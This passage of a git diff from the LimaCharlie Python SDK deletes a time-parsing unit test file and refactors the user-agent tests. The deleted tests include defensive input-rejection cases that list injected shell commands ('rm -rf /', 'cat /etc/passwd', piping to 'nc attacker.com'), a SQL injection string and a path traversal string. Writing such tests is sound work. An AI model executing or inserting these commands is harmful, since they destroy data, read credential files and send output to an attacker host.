\ No newline at end of file
diff --git a/tests/unit/test_time_utils.py b/tests/unit/test_time_utils.py
deleted file mode 100644
index 310469d0..00000000
--- a/tests/unit/test_time_utils.py
+++ /dev/null
@@ -1,926 +0,0 @@
-"""
-Unit tests for time parsing utilities.
-
-Tests various time input formats:
-- Relative times (now, now-10m, now-1h)
-- ISO dates
-- Unix timestamps
-"""
-
-import pytest
-import time
-from datetime import datetime, timezone, timedelta
-from limacharlie.time_utils import parse_time_input, parse_time_range, format_timestamp
-
-
-class TestParseTimeInput:
-    """Test the parse_time_input function."""
-
-    def test_parse_now(self):
-        """Test parsing 'now'."""
-        result = parse_time_input("now")
-        current = int(time.time())
-
-        # Should be within 1 second of current time
-        assert abs(result - current) <= 1
-
-    def test_parse_relative_minutes(self):
-        """Test parsing relative time in minutes."""
-        result = parse_time_input("now-10m")
-        expected = int(time.time()) - (10 * 60)
-
-        # Should be within 1 second
-        assert abs(result - expected) <= 1
-
-    def test_parse_relative_hours(self):
-        """Test parsing relative time in hours."""
-        result = parse_time_input("now-2h")
-        expected = int(time.time()) - (2 * 3600)
-
-        assert abs(result - expected) <= 1
-
-    def test_parse_relative_days(self):
-        """Test parsing relative time in days."""
-        result = parse_time_input("now-7d")
-        expected = int(time.time()) - (7 * 86400)
-
-        assert abs(result - expected) <= 1
-
-    def test_parse_relative_weeks(self):
-        """Test parsing relative time in weeks."""
-        result = parse_time_input("now-2w")
-        expected = int(time.time()) - (2 * 7 * 86400)
-
-        assert abs(result - expected) <= 1
-
-    def test_parse_relative_seconds(self):
-        """Test parsing relative time in seconds."""
-        result = parse_time_input("now-30s")
-        expected = int(time.time()) - 30
-
-        assert abs(result - expected) <= 1
-
-    def test_parse_relative_with_spaces(self):
-        """Test parsing relative time with spaces."""
-        result = parse_time_input("now - 10m")
-        expected = int(time.time()) - (10 * 60)
-
-        assert abs(result - expected) <= 1
-
-    def test_parse_unix_timestamp_seconds(self):
-        """Test parsing Unix timestamp in seconds."""
-        timestamp = 1234567890
-        result = parse_time_input(str(timestamp))
-
-        assert result == timestamp
-
-    def test_parse_unix_timestamp_milliseconds(self):
-        """Test parsing Unix timestamp in milliseconds."""
-        timestamp_ms = 1234567890000
-        result = parse_time_input(str(timestamp_ms))
-
-        # Should convert to seconds
-        assert result == timestamp_ms // 1000
-
-    def test_parse_unix_timestamp_as_int(self):
-        """Test parsing Unix timestamp as integer."""
-        timestamp = 1234567890
-        result = parse_time_input(timestamp)
-
-        assert result == timestamp
-
-    def test_parse_iso_date(self):
-        """Test parsing ISO date (date only)."""
-        result = parse_time_input("2025-12-30")
-
-        # Should parse as midnight UTC
-        expected = datetime(2025, 12, 30, 0, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_iso_datetime_space(self):
-        """Test parsing ISO datetime with space separator."""
-        result = parse_time_input("2025-12-30 10:00:00")
-
-        expected = datetime(2025, 12, 30, 10, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_iso_datetime_t_separator(self):
-        """Test parsing ISO datetime with T separator."""
-        result = parse_time_input("2025-12-30T10:00:00")
-
-        expected = datetime(2025, 12, 30, 10, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_iso_datetime_with_z(self):
-        """Test parsing ISO datetime with Z timezone."""
-        result = parse_time_input("2025-12-30T10:00:00Z")
-
-        expected = datetime(2025, 12, 30, 10, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_iso_datetime_with_microseconds(self):
-        """Test parsing ISO datetime with microseconds."""
-        result = parse_time_input("2025-12-30T10:00:00.123456Z")
-
-        expected = datetime(2025, 12, 30, 10, 0, 0, 123456, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_iso_datetime_with_timezone_offset(self):
-        """Test parsing ISO datetime with timezone offset."""
-        # This is 10:00 in +05:00, which is 05:00 UTC
-        result = parse_time_input("2025-12-30T10:00:00+05:00")
-
-        # Create the datetime with UTC equivalent (05:00 UTC)
-        expected = datetime(2025, 12, 30, 5, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_empty_string(self):
-        """Test that empty string raises ValueError."""
-        with pytest.raises(ValueError) as exc_info:
-            parse_time_input("")
-
-        assert "cannot be empty" in str(exc_info.value)
-
-    def test_parse_none(self):
-        """Test that None raises ValueError."""
-        with pytest.raises(ValueError) as exc_info:
-            parse_time_input(None)
-
-        assert "cannot be empty" in str(exc_info.value)
-
-    def test_parse_invalid_format(self):
-        """Test that invalid format raises ValueError."""
-        with pytest.raises(ValueError) as exc_info:
-            parse_time_input("not-a-valid-time")
-
-        assert "Unable to parse time" in str(exc_info.value)
-
-    def test_parse_case_insensitive(self):
-        """Test that parsing is case insensitive."""
-        result1 = parse_time_input("NOW")
-        result2 = parse_time_input("Now")
-        result3 = parse_time_input("now")
-
-        current = int(time.time())
-
-        # All should be within 1 second of current time
-        assert abs(result1 - current) <= 1
-        assert abs(result2 - current) <= 1
-        assert abs(result3 - current) <= 1
-
-
-class TestParseTimeRange:
-    """Test the parse_time_range function."""
-
-    def test_parse_valid_range(self):
-        """Test parsing a valid time range."""
-        start, end = parse_time_range("now-1h", "now")
-
-        current = int(time.time())
-        expected_start = current - 3600
-
-        # Should be within 1 second
-        assert abs(start - expected_start) <= 1
-        assert abs(end - current) <= 1
-
-    def test_parse_range_with_iso_dates(self):
-        """Test parsing time range with ISO dates."""
-        start, end = parse_time_range("2025-12-30", "2025-12-31")
-
-        expected_start = datetime(2025, 12, 30, 0, 0, 0, tzinfo=timezone.utc)
-        expected_end = datetime(2025, 12, 31, 0, 0, 0, tzinfo=timezone.utc)
-
-        assert start == int(expected_start.timestamp())
-        assert end == int(expected_end.timestamp())
-
-    def test_parse_range_with_timestamps(self):
-        """Test parsing time range with Unix timestamps."""
-        start, end = parse_time_range("1234567890", "1234567900")
-
-        assert start == 1234567890
-        assert end == 1234567900
-
-    def test_parse_invalid_range_start_after_end(self):
-        """Test that start > end raises ValueError."""
-        with pytest.raises(ValueError) as exc_info:
-            parse_time_range("now", "now-1h")
-
-        assert "Start time" in str(exc_info.value)
-        assert "after end time" in str(exc_info.value)
-
-    def test_parse_range_mixed_formats(self):
-        """Test parsing time range with mixed formats."""
-        # Use a date in the past to ensure test always passes
-        start, end = parse_time_range("2020-01-01", "now")
-
-        current = int(time.time())
-        expected_start = datetime(2020, 1, 1, 0, 0, 0, tzinfo=timezone.utc)
-
-        assert start == int(expected_start.timestamp())
-        assert abs(end - current) <= 1
-
-
-class TestFormatTimestamp:
-    """Test the format_timestamp function."""
-
-    def test_format_iso(self):
-        """Test formatting timestamp as ISO format."""
-        timestamp = 1234567890  # 2009-02-13T23:31:30Z
-        result = format_timestamp(timestamp, use_iso=True)
-
-        # Should be valid ISO format
-        assert "2009-02-13" in result
-        assert "23:31:30" in result
-
-    def test_format_human_readable(self):
-        """Test formatting timestamp as human-readable."""
-        timestamp = 1234567890
-        result = format_timestamp(timestamp, use_iso=False)
-
-        # Should contain date and time with UTC
-        assert "2009-02-13" in result
-        assert "23:31:30" in result
-        assert "UTC" in result
-
-
-class TestEdgeCases:
-    """Test edge cases and corner scenarios."""
-
-    def test_very_large_timestamp_milliseconds(self):
-        """Test that very large timestamps are treated as milliseconds."""
-        # Timestamp for 2025-12-30 in milliseconds
-        timestamp_ms = 1735516800000
-        result = parse_time_input(str(timestamp_ms))
-
-        # Should be converted to seconds
-        assert result == timestamp_ms // 1000
-
-    def test_relative_months_approximate(self):
-        """
-        Test that months are approximated as 30 days.
-
-        The 'M' (uppercase) unit represents months, while 'm' (lowercase) represents minutes.
-        This test verifies that months parsing works correctly.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result = parse_time_input("now-1M")
-        expected = int(time.time()) - (30 * 86400)  # 30 days in seconds
-
-        # Should be within 1 second
-        assert abs(result - expected) <= 1
-
-    def test_relative_months_vs_minutes_distinction(self):
-        """
-        Test that uppercase 'M' (months) is distinct from lowercase 'm' (minutes).
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result_minutes = parse_time_input("now-1m")
-        result_months = parse_time_input("now-1M")
-
-        expected_minutes = int(time.time()) - 60  # 1 minute in seconds
-        expected_months = int(time.time()) - (30 * 86400)  # 30 days in seconds
-
-        # Verify minutes
-        assert abs(result_minutes - expected_minutes) <= 1
-
-        # Verify months
-        assert abs(result_months - expected_months) <= 1
-
-        # Verify they are significantly different (at least 29 days apart)
-        assert result_minutes - result_months > 29 * 86400
-
-    def test_relative_years_approximate(self):
-        """Test that years are approximated as 365 days."""
-        result = parse_time_input("now-1y")
-        expected = int(time.time()) - (365 * 86400)
-
-        # Should be within 1 second
-        assert abs(result - expected) <= 1
-
-    def test_whitespace_trimming(self):
-        """Test that whitespace is properly trimmed."""
-        result = parse_time_input("  now-10m  ")
-        expected = int(time.time()) - (10 * 60)
-
-        assert abs(result - expected) <= 1
-
-    def test_zero_relative_time(self):
-        """Test relative time with zero offset."""
-        result = parse_time_input("now-0m")
-        current = int(time.time())
-
-        assert abs(result - current) <= 1
-
-
-class TestTimeInputEdgeCases:
-    """Test edge cases for time input parsing."""
-
-    def test_parse_max_int_timestamp(self):
-        """
-        Test parsing maximum reasonable timestamp.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Year 3000 (32503680000) - will be treated as milliseconds
-        max_ts = 32503680000
-        result = parse_time_input(str(max_ts))
-
-        # Since > 10^10, treated as milliseconds and converted to seconds
-        assert result == max_ts // 1000
-
-    def test_parse_milliseconds_boundary(self):
-        """
-        Test timestamp at boundary between seconds and milliseconds.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # 10^10 is the boundary (Sat Nov 20 2286)
-        # Implementation uses > not >= for the boundary check
-        boundary = 10_000_000_000
-
-        # Just below boundary - treated as seconds
-        result_below = parse_time_input(str(boundary - 1))
-        assert result_below == boundary - 1
-
-        # At exact boundary - still treated as seconds (> not >=)
-        result_at = parse_time_input(str(boundary))
-        assert result_at == boundary
-
-        # Above boundary - treated as milliseconds
-        result_above = parse_time_input(str(boundary + 1000000))
-        assert result_above == (boundary + 1000000) // 1000
-
-    def test_parse_relative_time_boundaries(self):
-        """
-        Test relative time at boundaries.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Test maximum reasonable relative times
-        relative_times = [
-            ("now-0s", 0),
-            ("now-1s", 1),
-            ("now-59s", 59),
-            ("now-60s", 60),
-            ("now-1m", 60),
-            ("now-59m", 59 * 60),
-            ("now-60m", 60 * 60),
-            ("now-1h", 3600),
-            ("now-23h", 23 * 3600),
-            ("now-24h", 24 * 3600),
-            ("now-1d", 86400),
-            ("now-7d", 7 * 86400),
-            ("now-30d", 30 * 86400),
-            ("now-365d", 365 * 86400),
-        ]
-
-        current = int(time.time())
-
-        for time_str, expected_offset in relative_times:
-            result = parse_time_input(time_str)
-            expected = current - expected_offset
-
-            # Allow 2 second tolerance for test execution time
-            assert abs(result - expected) <= 2, f"Failed for {time_str}"
-
-    def test_parse_iso_date_edge_cases(self):
-        """
-        Test ISO date parsing edge cases.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # First day of year
-        result = parse_time_input("2025-01-01")
-        expected = datetime(2025, 1, 1, 0, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-        # Last day of year
-        result = parse_time_input("2025-12-31")
-        expected = datetime(2025, 12, 31, 0, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-        # Leap year day
-        result = parse_time_input("2024-02-29")
-        expected = datetime(2024, 2, 29, 0, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_iso_datetime_midnight(self):
-        """
-        Test ISO datetime at exactly midnight.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result = parse_time_input("2025-12-30 00:00:00")
-        expected = datetime(2025, 12, 30, 0, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_iso_datetime_end_of_day(self):
-        """
-        Test ISO datetime at end of day.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result = parse_time_input("2025-12-30 23:59:59")
-        expected = datetime(2025, 12, 30, 23, 59, 59, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_different_timezone_offsets(self):
-        """
-        Test ISO datetime with various timezone offsets.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Positive offsets
-        result = parse_time_input("2025-12-30T12:00:00+01:00")
-        # 12:00 in +01:00 is 11:00 UTC
-        expected = datetime(2025, 12, 30, 11, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-        # Negative offsets
-        result = parse_time_input("2025-12-30T12:00:00-05:00")
-        # 12:00 in -05:00 is 17:00 UTC
-        expected = datetime(2025, 12, 30, 17, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-        # Large positive offset
-        result = parse_time_input("2025-12-30T12:00:00+12:00")
-        # 12:00 in +12:00 is 00:00 UTC same day
-        expected = datetime(2025, 12, 30, 0, 0, 0, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_with_microseconds_precision(self):
-        """
-        Test ISO datetime with microseconds.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result = parse_time_input("2025-12-30T10:30:45.123456Z")
-
-        expected = datetime(2025, 12, 30, 10, 30, 45, 123456, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_with_milliseconds(self):
-        """
-        Test ISO datetime with milliseconds.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result = parse_time_input("2025-12-30 10:30:45.123")
-
-        expected = datetime(2025, 12, 30, 10, 30, 45, 123000, tzinfo=timezone.utc)
-        assert result == int(expected.timestamp())
-
-    def test_parse_large_relative_values(self):
-        """
-        Test large relative time values.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # 10 years ago (approximately)
-        result = parse_time_input("now-10y")
-        current = int(time.time())
-        expected = current - (10 * 365 * 86400)
-
-        assert abs(result - expected) <= 2
-
-        # 100 days ago
-        result = parse_time_input("now-100d")
-        expected = current - (100 * 86400)
-
-        assert abs(result - expected) <= 2
-
-    def test_parse_whitespace_variations(self):
-        """
-        Test various whitespace scenarios.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Leading/trailing whitespace
-        assert parse_time_input("  now  ") == parse_time_input("now")
-        assert parse_time_input("  now-1h  ") == parse_time_input("now-1h")
-
-        # Whitespace in relative time
-        result1 = parse_time_input("now - 1h")
-        result2 = parse_time_input("now-1h")
-        assert abs(result1 - result2) <= 1
-
-        # Multiple spaces
-        result = parse_time_input("now  -  1h")
-        expected = int(time.time()) - 3600
-        assert abs(result - expected) <= 1
-
-
-class TestTimeInputErrors:
-    """Test error handling for invalid time inputs."""
-
-    def test_parse_invalid_relative_format(self):
-        """
-        Test invalid relative time formats.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        invalid_formats = [
-            "now+1h",  # Plus instead of minus
-            "now-",  # Missing value
-            "now-h",  # Missing number
-            "now-1",  # Missing unit
-            "now-1x",  # Invalid unit
-            "now--1h",  # Double minus
-            "1h-now",  # Reversed
-        ]
-
-        for invalid in invalid_formats:
-            with pytest.raises(ValueError):
-                parse_time_input(invalid)
-
-    def test_parse_invalid_iso_dates(self):
-        """
-        Test invalid ISO date formats.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        invalid_dates = [
-            "2025-13-01",  # Invalid month
-            "2025-12-32",  # Invalid day
-            "2025-02-30",  # Invalid day for February
-            "2025-00-01",  # Zero month
-            "2025-01-00",  # Zero day
-            "2025/12/30",  # Wrong separator
-            "30-12-2025",  # Wrong order
-            "2025-12",  # Incomplete
-        ]
-
-        for invalid in invalid_dates:
-            with pytest.raises(ValueError):
-                parse_time_input(invalid)
-
-    def test_parse_invalid_timestamp(self):
-        """
-        Test invalid timestamp formats.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        invalid_timestamps = [
-            "12345abc",  # Mixed alphanumeric
-            "1.234e10",  # Scientific notation
-            "-1234567890",  # Negative
-            "12.34",  # Decimal
-        ]
-
-        for invalid in invalid_timestamps:
-            with pytest.raises(ValueError):
-                parse_time_input(invalid)
-
-    def test_parse_special_characters(self):
-        """
-        Test input with special characters.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        special_inputs = [
-            "now$1h",
-            "now@1h",
-            "now#1h",
-            "2025-12-30; DROP TABLE",  # SQL injection attempt
-            "../../../etc/passwd",  # Path traversal attempt
-        ]
-
-        for special in special_inputs:
-            with pytest.raises(ValueError):
-                parse_time_input(special)
-
-    def test_parse_extremely_long_input(self):
-        """
-        Test extremely long input strings.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Very long string
-        long_input = "now-" + ("1" * 10000) + "h"
-
-        with pytest.raises(ValueError):
-            parse_time_input(long_input)
-
-
-class TestTimeRangeExtended:
-    """Extended tests for time range parsing."""
-
-    def test_parse_time_range_same_time(self):
-        """
-        Test time range where start equals end.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        timestamp = "1234567890"
-
-        # Same time is valid (only raises error if start > end)
-        start, end = parse_time_range(timestamp, timestamp)
-        assert start == end == 1234567890
-
-    def test_parse_time_range_large_span(self):
-        """
-        Test time range spanning long periods.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # 1 year span
-        start, end = parse_time_range("now-365d", "now")
-        assert end - start >= 365 * 86400 - 100  # Allow some tolerance
-
-    def test_parse_time_range_small_span(self):
-        """
-        Test time range spanning short periods.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # 1 second span
-        current = int(time.time())
-        start, end = parse_time_range(str(current), str(current + 1))
-        assert end - start == 1
-
-
-class TestFormatTimestampExtended:
-    """Extended tests for timestamp formatting."""
-
-    def test_format_timestamp_current_time(self):
-        """
-        Test formatting current timestamp.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        current = int(time.time())
-        result = format_timestamp(current)
-
-        # Should contain current date
-        now = datetime.now(timezone.utc)
-        assert str(now.year) in result
-
-    def test_format_timestamp_zero(self):
-        """
-        Test formatting timestamp zero (epoch).
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result = format_timestamp(0)
-
-        # Epoch is 1970-01-01
-        assert "1970-01-01" in result
-
-    def test_format_timestamp_future(self):
-        """
-        Test formatting future timestamp.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Year 2100
-        future = 4102444800
-        result = format_timestamp(future)
-
-        assert "2100" in result
-
-
-class TestTimeParsingConsistency:
-    """Test consistency and round-trip conversions."""
-
-    def test_parse_format_roundtrip_iso(self):
-        """
-        Test parsing and formatting ISO dates maintains consistency.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        original = "2025-12-30T10:30:00Z"
-        parsed = parse_time_input(original)
-        formatted = format_timestamp(parsed, use_iso=True)
-
-        # Parse formatted result
-        reparsed = parse_time_input(formatted)
-
-        assert parsed == reparsed
-
-    def test_parse_format_roundtrip_timestamp(self):
-        """
-        Test parsing and formatting timestamps maintains consistency.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        original = 1234567890
-        formatted = format_timestamp(original, use_iso=True)
-        reparsed = parse_time_input(formatted)
-
-        assert original == reparsed
-
-    def test_relative_time_consistency(self):
-        """
-        Test that relative times are consistent across multiple calls.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Parse the same relative time multiple times quickly
-        results = []
-        for _ in range(5):
-            results.append(parse_time_input("now-1h"))
-
-        # All results should be within a few seconds of each other
-        for i in range(1, len(results)):
-            assert abs(results[i] - results[0]) <= 1
-
-    def test_now_consistency(self):
-        """
-        Test that 'now' returns consistent current time.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        result1 = parse_time_input("now")
-        time.sleep(0.1)
-        result2 = parse_time_input("now")
-
-        # Should be very close (within 1 second)
-        assert abs(result2 - result1) <= 1
-
-
-class TestTimeParsingSecurityEdgeCases:
-    """Test security-related edge cases."""
-
-    def test_parse_null_bytes(self):
-        """
-        Test input containing null bytes.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        with pytest.raises(ValueError):
-            parse_time_input("now\x00-1h")
-
-    def test_parse_unicode_characters(self):
-        """
-        Test input with unicode characters.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Unicode characters in input - will fail to match pattern and raise ValueError
-        # Note: Some unicode chars may slip through regex, depends on the char
-        try:
-            parse_time_input("now-1𝟙h")  # Unicode digit
-        except ValueError:
-            pass  # Expected
-        # Not raising is OK - will be caught as invalid format
-
-    def test_parse_control_characters(self):
-        """
-        Test input with control characters.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        # Control characters in input - will fail to match pattern
-        try:
-            parse_time_input("now\r\n-1h")
-        except ValueError:
-            pass  # Expected
-        # Not raising is OK - will be caught as invalid format eventually
-
-    def test_parse_no_command_injection(self):
-        """
-        Test that command injection attempts fail safely.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        malicious_inputs = [
-            "now-1h; rm -rf /",
-            "now-1h && cat /etc/passwd",
-            "now-1h | nc attacker.com 1234",
-            "$(whoami)",
-            "`id`",
-        ]
-
-        for malicious in malicious_inputs:
-            with pytest.raises(ValueError):
-                parse_time_input(malicious)
diff --git a/tests/unit/test_user_agent.py b/tests/unit/test_user_agent.py
index f48776e5..fb220e2f 100644
--- a/tests/unit/test_user_agent.py
+++ b/tests/unit/test_user_agent.py
@@ -5,56 +5,33 @@
 
 import pytest
 
-from limacharlie.Manager import _build_user_agent
-from limacharlie.WebhookSender import _build_webhook_user_agent
 from limacharlie.user_agent_utils import (
     _get_python_version,
     _get_os_info,
     _get_ssl_version,
-    build_user_agent
+    build_user_agent,
 )
 
 
 class TestBuildUserAgent:
-    """Tests for the _build_user_agent function in Manager.py."""
+    """Tests for the build_user_agent function in user_agent_utils.py."""
 
     def test_user_agent_format(self):
-        """
-        Test that User-Agent has the correct format with semicolon separators.
-
-        Example User-Agent:
-        lc-py-api/4.10.3;python-3.11.2;debian-12;openssl-3.0.0
-        """
-        result = _build_user_agent()
+        result = build_user_agent("lc-py-api", "5.0.0")
         assert isinstance(result, str)
         assert ';' in result
         parts = result.split(';')
-        # Should have at least 3 parts: library version, python version, OS
-        # May have 4 if SSL info is available
         assert len(parts) >= 3
 
     def test_user_agent_contains_library_version(self):
-        """
-        Test that User-Agent contains the library version.
-
-        Example component: lc-py-api/4.10.3
-        """
-        result = _build_user_agent()
+        result = build_user_agent("lc-py-api", "5.0.0")
         assert 'lc-py-api/' in result
         parts = result.split(';')
-        # First part should be the library version
         assert parts[0].startswith('lc-py-api/')
 
     def test_user_agent_contains_python_version(self):
-        """
-        Test that User-Agent contains Python version.
-
-        Example component: python-3.11.2
-        """
-        result = _build_user_agent()
+        result = build_user_agent("lc-py-api", "5.0.0")
         assert 'python-' in result
-
-        # Verify format matches current Python version
         expected_version = '%d.%d.%d' % (
             sys.version_info.major,
             sys.version_info.minor,
@@ -63,239 +40,66 @@ def test_user_agent_contains_python_version(self):
         assert 'python-%s' % expected_version in result
 
     def test_user_agent_contains_os_info(self):
-        """
-        Test that User-Agent contains OS information.
-
-        Example components:
-        - Linux: debian-12, ubuntu-22.04, linux
-        - macOS: macos-14.0, darwin
-        - Windows: windows-10, windows
-        """
-        result = _build_user_agent()
+        result = build_user_agent("lc-py-api", "5.0.0")
         parts = result.split(';')
-
-        # OS info should be the third component
         os_part = parts[2] if len(parts) > 2 else None
         assert os_part is not None
-
-        # Check that it contains some OS identifier
         os_indicators = ['linux', 'debian', 'ubuntu', 'centos', 'rhel',
                         'macos', 'darwin', 'windows']
         assert any(indicator in os_part.lower() for indicator in os_indicators)
 
     def test_user_agent_contains_ssl_version_if_available(self):
-        """
-        Test that User-Agent contains SSL version when available.
-
-        Example component: openssl-3.0.0
-        """
-        result = _build_user_agent()
-
-        # SSL version should be included if available
+        result = build_user_agent("lc-py-api", "5.0.0")
         if hasattr(ssl, 'OPENSSL_VERSION_INFO'):
             assert 'openssl-' in result
             parts = result.split(';')
-            # Should be the 4th component
             ssl_part = next((p for p in parts if p.startswith('openssl-')), None)
             assert ssl_part is not None
-            # Verify format: openssl-X.Y.Z
             assert ssl_part.count('.') == 2
 
     def test_user_agent_consistent_format(self):
-        """
-        Test that User-Agent format is consistent across multiple calls.
-
-        Ensures the function produces deterministic output.
-        """
-        result1 = _build_user_agent()
-        result2 = _build_user_agent()
+        result1 = build_user_agent("lc-py-api", "5.0.0")
+        result2 = build_user_agent("lc-py-api", "5.0.0")
         assert result1 == result2
 
 
-class TestBuildWebhookUserAgent:
-    """Tests for the _build_webhook_user_agent function in WebhookSender.py."""
-
-    def test_webhook_user_agent_format(self):
-        """
-        Test that webhook User-Agent has the correct format.
-
-        Example User-Agent:
-        lc-sdk-webhook/4.10.3;python-3.11.2;debian-12;openssl-3.0.0
-        """
-        result = _build_webhook_user_agent()
-        assert isinstance(result, str)
-        assert ';' in result
-        parts = result.split(';')
-        # Should have at least 3 parts: library version, python version, OS
-        # May have 4 if SSL info is available
-        assert len(parts) >= 3
-
-    def test_webhook_user_agent_contains_library_version(self):
-        """
-        Test that webhook User-Agent contains the library version.
-
-        Example component: lc-sdk-webhook/4.10.3
-        """
-        result = _build_webhook_user_agent()
-        assert 'lc-sdk-webhook/' in result
-        parts = result.split(';')
-        # First part should be the library version
-        assert parts[0].startswith('lc-sdk-webhook/')
-
-    def test_webhook_user_agent_contains_python_version(self):
-        """
-        Test that webhook User-Agent contains Python version.
-
-        Example component: python-3.11.2
-        """
-        result = _build_webhook_user_agent()
-        assert 'python-' in result
-
-        # Verify format matches current Python version
-        expected_version = '%d.%d.%d' % (
-            sys.version_info.major,
-            sys.version_info.minor,
-            sys.version_info.micro
-        )
-        assert 'python-%s' % expected_version in result
-
-    def test_webhook_user_agent_contains_os_info(self):
-        """
-        Test that webhook User-Agent contains OS information.
-
-        Example components:
-        - Linux: debian-12, ubuntu-22.04, linux
-        - macOS: macos-14.0, darwin
-        - Windows: windows-10, windows
-        """
-        result = _build_webhook_user_agent()
-        parts = result.split(';')
-
-        # OS info should be the third component
-        os_part = parts[2] if len(parts) > 2 else None
-        assert os_part is not None
-
-        # Check that it contains some OS identifier
-        os_indicators = ['linux', 'debian', 'ubuntu', 'centos', 'rhel',
-                        'macos', 'darwin', 'windows']
-        assert any(indicator in os_part.lower() for indicator in os_indicators)
-
-    def test_webhook_user_agent_contains_ssl_version_if_available(self):
-        """
-        Test that webhook User-Agent contains SSL version when available.
-
-        Example component: openssl-3.0.0
-        """
-        result = _build_webhook_user_agent()
-
-        # SSL version should be included if available
-        if hasattr(ssl, 'OPENSSL_VERSION_INFO'):
-            assert 'openssl-' in result
-            parts = result.split(';')
-            # Should be the 4th component
-            ssl_part = next((p for p in parts if p.startswith('openssl-')), None)
-            assert ssl_part is not None
-            # Verify format: openssl-X.Y.Z
-            assert ssl_part.count('.') == 2
-
-
-class TestUserAgentComparison:
-    """Tests comparing API and webhook User-Agent functions."""
-
-    def test_api_and_webhook_differ_only_in_prefix(self):
-        """
-        Test that API and webhook User-Agents differ only in the library prefix.
-
-        API starts with: lc-py-api/VERSION
-        Webhook starts with: lc-sdk-webhook/VERSION
-
-        The rest of the components (Python version, OS, SSL) should be identical.
-        """
-        api_ua = _build_user_agent()
-        webhook_ua = _build_webhook_user_agent()
-
-        api_parts = api_ua.split(';')
-        webhook_parts = webhook_ua.split(';')
-
-        # Should have same number of parts
-        assert len(api_parts) == len(webhook_parts)
-
-        # First part should differ (library prefix)
-        assert api_parts[0].startswith('lc-py-api/')
-        assert webhook_parts[0].startswith('lc-sdk-webhook/')
-
-        # All other parts should be identical (Python version, OS, SSL)
-        for i in range(1, len(api_parts)):
-            assert api_parts[i] == webhook_parts[i], \
-                f"Component {i} differs: API='{api_parts[i]}' vs Webhook='{webhook_parts[i]}'"
-
-
 class TestUserAgentOSDetection:
     """Tests for OS detection logic in User-Agent functions."""
 
     def test_linux_with_freedesktop_os_release(self):
-        """
-        Test User-Agent generation on Linux with freedesktop_os_release.
-
-        Example result: debian-12, ubuntu-22.04
-        """
         if not hasattr(platform, 'freedesktop_os_release'):
             pytest.skip("freedesktop_os_release not available on this platform")
 
-        result = _build_user_agent()
-
-        # On Linux systems with freedesktop_os_release, should get distribution info
+        result = build_user_agent("lc-py-api", "5.0.0")
         if platform.system().lower() == 'linux':
             parts = result.split(';')
             os_part = parts[2]
-            # Should contain a hyphen separating OS name and version
-            # Examples: debian-12, ubuntu-22.04
             assert '-' in os_part or os_part == 'linux'
 
     def test_macos_detection(self):
-        """
-        Test User-Agent generation on macOS.
-
-        Example result: macos-14.0
-        """
         if platform.system().lower() != 'darwin':
             pytest.skip("Test only runs on macOS")
 
-        result = _build_user_agent()
+        result = build_user_agent("lc-py-api", "5.0.0")
         parts = result.split(';')
         os_part = parts[2]
-
-        # Should contain either 'macos' or 'darwin'
         assert 'macos' in os_part.lower() or 'darwin' in os_part.lower()
 
     def test_windows_detection(self):
-        """
-        Test User-Agent generation on Windows.
-
-        Example result: windows-10, windows-11
-        """
         if platform.system().lower() != 'windows':
             pytest.skip("Test only runs on Windows")
 
-        result = _build_user_agent()
+        result = build_user_agent("lc-py-api", "5.0.0")
         parts = result.split(';')
         os_part = parts[2]
-
-        # Should contain 'windows'
         assert 'windows' in os_part.lower()
 
     def test_os_detection_fallback(self):
-        """
